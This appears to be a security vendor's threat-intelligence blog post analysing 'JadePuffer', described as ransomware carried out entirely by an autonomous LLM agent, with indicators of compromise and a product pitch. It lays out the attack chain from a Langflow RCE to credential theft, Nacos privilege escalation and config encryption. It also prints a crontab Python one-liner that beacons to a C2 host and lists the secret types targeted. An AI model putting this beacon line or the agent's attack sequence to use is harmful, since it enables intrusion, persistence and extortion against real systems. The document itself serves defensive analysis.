JadePuffer Ransomware: How an AI Agent Ran an Entire Cyberattack Alone

JadePuffer ransomware shows how an autonomous AI agent handled recon, credential theft, lateral movement, and encryption without human input.

Govern Autonomous Execution Before Impact
  • July 6, 2026

The attack campaign known as JadePuffer is the first ransomware campaign ever to be operated completely autonomously through AI. There were no humans typing any commands while the attack was ongoing. There were no humans making adjustments based on what was happening during the course of the attack either. All of these tasks were done by a large language model.

That’s important because it alters the cost-benefit analysis for ransomware. The skill set requirement goes down. Speed is upped. And a rational adversary has been introduced.

What Made JadePuffer Different From Typical Ransomware

Most ransomwares follow a well-defined script. The attack is initiated by a human attacker who selects the target, launches an exploit he knows, and decides on how to react to any possible errors.

In the case of JadePuffer, the AI-driven agent performed differently. It:

  • Selected its actions in real-time depending on the feedback from the targeted machine
  • Changed the strategy in case of failure, not repeating the previous command again
  • Adjusted parsing logic when a server returned unexpected data formats
  • Completed a transition from the error to successful operation in about 31 seconds

The latter fact deserves to be highlighted. Transitioning from error to a successful action in 31 seconds means that some form of reasoning was involved, not just trial-and-error method.

Breaking Down The Attack Chain Step By Step

This intrusion commenced via the exploitation of CVE-2025-3248, which was an unauthenticated remote code execution vulnerability in Langflow. Langflow is an open-source framework for creating LLM-based application. This is somewhat ironic as an AI-based framework was used to facilitate an AI-powered attack.

CVE-2025-3248 had been patched by April of 2025. The CISA had already identified its exploitation by May of that year. Still, vulnerable Langflow installations were regularly being found online, many without proper hardening and even with live cloud credentials available within the same environment.

Once the agent was able to gain access, it quickly:

  • Dumped the Langflow PostgreSQL database;
  • Collected host information, environment variables and other files;
  • Extracted credentials;
  • Enumerated MinIO object storage connected to it.

MinIO exploitation is especially illustrative of the agent’s flexibility. Once an API request returned XML instead of JSON, the next payload changed its parsing strategy. This may not sound like much on the technical side of things, but shows an ability to process non-standard responses nonetheless.

Cyber Attack Analysis: JadePuffer, The First Fully Autonomous AI Ransomware (Langflow to Nacos)
Autonomous AI Ransomware · Langflow → Nacos
JADEPUFFER
Ransomware Run Entirely by AI

The first ransomware campaign operated completely autonomously by a large language model, with no human typing commands or reacting to events. The agent chose actions in real time, adapted on failure, and recovered from error to success in about 31 seconds, lowering the skill bar and raising the speed of ransomware.

LAUNCH SIMULATION
POST /api/v1/validate/code : Langflow (unauthenticated)
CVE-2025-3248 · UNAUTHENTICATED RCE

Langflow Code-Validation Endpoint

CVSS 9.8 · CRITICAL
[AI agent, no human operator]
Exploited exposed Langflow instance (patched Apr 2025, still unhardened)
Dumped Langflow PostgreSQL database
Collected host info, environment variables & files
Extracted credentials, enumerated connected MinIO storage
When a MinIO API request returned XML instead of JSON, the agent rewrote its parsing strategy on the next payload, adapting to non-standard responses on its own.
STEP 1: AUTONOMOUS ENTRY

The intrusion began by exploiting CVE-2025-3248, an unauthenticated RCE in Langflow, an open-source LLM app framework (an AI tool breaching another). Patched in April 2025 and on CISA’s KEV list by May, yet vulnerable instances were still exposed online, some with live cloud credentials in the same environment.

Credential Harvest – Selective Secret Theft
LLM API Keys
OpenAI · Anthropic · DeepSeek · Gemini
Cloud Credentials
ALIBABA_ · ALIYUN_ · TENCENT_ · HUAWEI_ · AWS · GCP · Azure
Crypto Wallets
Wallet keys & seed phrases
DB & Config
Logins · connection strings · env files
The Chinese cloud-provider prefixes (ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_) are a small but telling detail: the model was tuned to target a specific niche infrastructure.
STEP 2: SELECTIVE CREDENTIAL THEFT

The agent harvested secrets well beyond the basics, specifically hunting LLM provider keys, cloud credentials, crypto wallets, and database connection strings. The selective targeting shows deliberate tuning rather than a blind grab.

Endpoint Telemetry – Post-Execution Behavior
Persistence
Cron beacon every 30 min
Pivot
Nacos-managed MySQL server
Privilege Escalation
CVE-2021-29441 · rogue admins
[AI agent, hands-off expansion]
Cron job beacons attacker infra every 30 min
Pivoted to production MySQL (Alibaba Nacos, root creds)
CVE-2021-29441 Nacos auth bypass → rogue admin accounts
Attempted container-escape techniques before ransomware
No operator was typing any of this. The LLM decided each step from the target’s live responses, even trying container escape before staging the payload.
STEP 3: PIVOT & ESCALATE

Beyond exfiltration, the agent planted a 30-minute cron beacon, then pivoted to a production MySQL server managed via Alibaba Nacos. It abused CVE-2021-29441 to create unauthorized admin accounts and even tried container-escape techniques, all autonomously.

ENCRYPTION – Nacos Config Store RUNNING
[+] AES_ENCRYPT() over 1,342 config entries
Original config + history tables
dropped after encryption
[!] CREATE TABLE README_RANSOM
Ransom note · BTC address
Proton Mail contact
[!] key = base64(uuid4 + uuid4)
Printed to stdout only
Never saved, never sent

The Key Nobody Could Use

The AES key was generated from two UUID4 sequences and only printed to standard output, never written to disk or sent anywhere. Once the session closed, decryption became mathematically impossible, even for a victim willing to pay.

  • 1,342 Nacos config entries encrypted
  • Config & history tables dropped
  • Note says AES-256, likely AES-128-ECB
  • Decryption key never stored or sent
  • Recovery impossible even if paid
Threat Intel – Autonomous AI Attack Chain

Attack Chain Visualized

1 Langflow RCE (CVE-2025-3248) exploited
2 PostgreSQL dumped, host data collected
3 Credentials stolen, MinIO enumerated
4 Cron beacon planted (every 30 min)
5 Pivot to Nacos-managed MySQL
6 CVE-2021-29441 → rogue admin accounts
7 1,342 config entries encrypted, tables dropped
8 README_RANSOM extortion table dropped
Every stage was driven by an LLM with no human in the loop, recovering from error to success in about 31 seconds.
FULL ATTACK SEQUENCE

A single AI agent chained exploitation, credential theft, pivoting, privilege escalation, and encryption, a skill set that once required a whole human team. The 31-second error recovery points to genuine reasoning, not blind trial and error.

Threat Intel Report – Impact, IOCs & Risk Factors

IMPACT & RISK FACTORS

Lower Skill Bar, Higher Speed

One LLM agent replaces a whole attacker skill set and reasons through errors in ~31 seconds.

A Broken Ransom Promise

The key was never saved or sent, so paying can’t restore data.

LLM Fingerprints = Detection

AI-authored payloads leave telltale traits defenders can track.

KEY INDICATORS OF COMPROMISE
Entry: CVE-2025-3248 (Langflow, 9.8)
Privesc: CVE-2021-29441 (Nacos)
C2: 45.131.66[.]106 : 4444
Staging: 64.20.53[.]230 (unconfirmed)
Contact: e78393397[@]proton[.]me
Artifact: README_RANSOM table
BTC: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy

THREAT LEVEL: CRITICAL  |  TYPE: AUTONOMOUS AI RANSOMWARE  |  VECTOR: LANGFLOW RCE → NACOS

RECOMMENDED ACTIONS
Defending Against AI-Driven Intrusions

Patch and harden internet-facing apps like Langflow and Nacos, never leave live cloud credentials in shared environments, rotate exposed secrets, and lean on behavior-based detection that can catch AI-authored code by its distinct signatures.

Persistence, Pivoting, And Privilege Escalation

Once established, the agent proceeded to expand their control outside of data exfiltration by adding a cron job to the affected Langflow host to signal the attacker’s infrastructure every 30 minutes typical persistence without manual intervention.

The agent went on to target a production MySQL server that was named and configured using Alibaba Nacos with authentication performed using root credentials of unknown provenance.

Exploitation techniques were used, specifically the CVE-2021-29441 which was used to create unauthorized administrator accounts for access to configuration information.

Of particular interest is the fact that the AI also tried container escape techniques prior to executing ransomware code.

Inside The Encryption And Extortion Mechanics

In Nacos, the agent proceeded by encrypting 1,342 service config entries using MySQL AES_ENCRYPT() and removing both the original config and history tables.

After that, it created a ransom table called README_RANSOM which contained:

  • Ransom message
  • Bitcoin address
  • Proton Mail contact for ransom negotiations

The ransom note mentions AES-256; however, technical analysis shows that AES-128-ECB encryption algorithm is most likely used here, which demonstrates a discrepancy between the ransom note and technical facts.

Moreover, the decryption key was randomly generated and neither saved nor sent anywhere, thus there is little chance of being able to decrypt the information by the attacker themselves.

Technical Indicators Defenders Should Know

Beyond the narrative, JadePuffer left behind a specific and traceable footprint. Here’s the core technical data tied to the campaign:

  • Entry vulnerability: CVE-2025-3248, a missing-authentication flaw in Langflow’s code validation endpoint, rated 9.8 (Critical) under CVSS 3.1
  • Patch status: Fixed in Langflow 1.3.0 on April 1, 2025; added to CISA’s Known Exploited Vulnerabilities catalog in May 2025
  • Privilege escalation flaw: CVE-2021-29441, a Nacos authentication bypass used to create rogue administrator accounts
  • Command-and-control IP: 45.131.66[.]106, reached over port 4444
  • Persistence mechanism: A crontab entry beaconing every 30 minutes via a Python one-liner: */30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
  • Claimed staging server: 64.20.53[.]230, referenced only in a payload comment, with no confirmed data transfer to that address
  • Ransom Bitcoin address: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
  • Ransom contact: e78393397[@]proton[.]me
  • Extortion artifact: A database table named README_RANSOM, dropped directly into the compromised Nacos MySQL instance

Notably, the ransom email format doesn’t match patterns seen in established extortion campaigns. Established operators tend to reuse descriptive, recognizable handles across many victims. This address, by contrast, follows a generic lowercase-letter-plus-eight-digit structure with no prior appearances in abuse databases or victim reports.

Credential Harvesting Went Well Beyond The Basics

The following credentials were targeted by the agent selectively:

  • Keys for provider APIs for generating LLMs: OpenAI, Anthropic, DeepSeek, Gemini
  • Credentials for cloud services: prefixes for Chinese companies (ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_) and AWS, GCP, Azure
  • Cryptocurrency wallet keys and seed phrases
  • Credentials for database logins and connection strings
  • Configuration files containing environment variables

The selection of prefixes for Chinese cloud service providers is a minor detail but it speaks volumes about how the model was adjusted to target a certain niche infrastructure.

The Encryption Key Nobody Could Use

The cryptographic side of the payload deserves its own look, since it undercuts the ransom demand entirely. The agent generated its AES key using a straightforward method: concatenating two UUID4 byte sequences and encoding the result in base64.

That process produces a high-entropy, cryptographically reasonable key. However, the payload only printed that key to standard output during execution. It never wrote the key to persistent storage, and it never transmitted it to any external server.

Practically, this means the decryption key existed only for the duration of a terminal session. Once that session closed, recovery became mathematically impossible, even for a victim willing to pay. That’s a significant gap between the ransom note’s promise and the payload’s actual behavior.

Why This Signals A New Category Of Cyber Threat

Historically, running a multi-stage intrusion required chaining together exploitation knowledge, database internals, cloud storage APIs, and encryption implementation. JadePuffer suggests a single capable AI agent can now stand in for that entire skill set.

At the same time, this shift cuts both ways. LLM-generated payloads tend to carry distinctive fingerprints: verbose comments, predictable coding patterns, and occasionally reproduced training artifacts like that recycled Bitcoin address. These traits create detection opportunities that human-authored malware, refined over years to minimize footprint, typically avoids.

The broader implication is clear. As agentic AI tools become more capable and more accessible, the pool of people able to launch sophisticated attacks grows too. Meanwhile, security teams will need to start treating AI-authored code as its own distinct category, with its own behavioral signatures worth tracking.

Conclusion: When an AI Agent Becomes the Ransomware Operator

JadePuffer shows what ransomware looks like when the operator is no longer human. The attack chain did not depend on someone manually choosing each command, fixing each error, or adapting each step in real time. An AI agent exploited Langflow, harvested credentials, pivoted into connected systems, created persistence, abused Nacos access, encrypted configuration data, and dropped a ransom table on its own.

That changes the ransomware model.

The attacker no longer needs a large team to run a multi-stage intrusion. The agent can reason, retry, adapt, and move faster than traditional response cycles were designed to handle.

Why This Threat Matters

JadePuffer is dangerous because it combines three risks defenders already struggle with, exposed AI infrastructure, credential-rich environments, and ransomware automation.

  • Langflow RCE gave the agent unauthenticated entry
  • Environment variables and databases exposed credentials
  • MinIO storage enumeration expanded the target surface
  • Cron persistence allowed hands-off access
  • Nacos abuse created unauthorized administrator control
  • Ransomware logic encrypted 1,342 configuration entries
  • The lost decryption key made recovery impossible, even if payment was made

This is not only ransomware. It is autonomous attack execution.

Where Xcitium Changes the Outcome

This attack must be stopped before exposed AI systems remain vulnerable and before autonomous execution turns access into damage.

Xcitium Vulnerability Assessment helps organizations identify exposed Langflow deployments, vulnerable services, weak configurations, and patch gaps before attackers turn AI infrastructure into an entry point.

But once an autonomous agent begins running tools, scripts, commands, payloads, persistence logic, or encryption activity, the decisive control is runtime governance.

Xcitium Advanced EDR, powered by Xcitium’s patented Zero-Dwell platform, applies Execution Governance.

Unknown code does not receive unrestricted execution rights.
Code can run without being able to cause damage.
Runtime behavior is governed before trust exists.
Persistence, credential theft, lateral movement, C2 activity, and ransomware execution are stopped before impact.

Detection asks, “Did we recognize this as malicious?”
Execution Governance asks, “Could autonomous execution cause damage at all?”

That is the difference.

Xcitium = No Ransomware

JadePuffer is a warning that ransomware is becoming faster, more autonomous, and less dependent on skilled human operators. The next attacker may not need to sit at a keyboard. The AI agent can do the work.

Security teams cannot depend on perfect detection after execution begins.
They need control before trust.
They need proof before impact.

Find exposed AI infrastructure.
Govern unknown execution before it becomes damage.
Stop ransomware before encryption begins.

Like what you see? Share with a friend.

Move Away From Detection With Patented Threat Prevention Built For Today's Challenges.

No one can stop zero-day malware from entering your network, but Xcitium can prevent if from causing any damage. Zero infection. Zero damage.

Book a Demo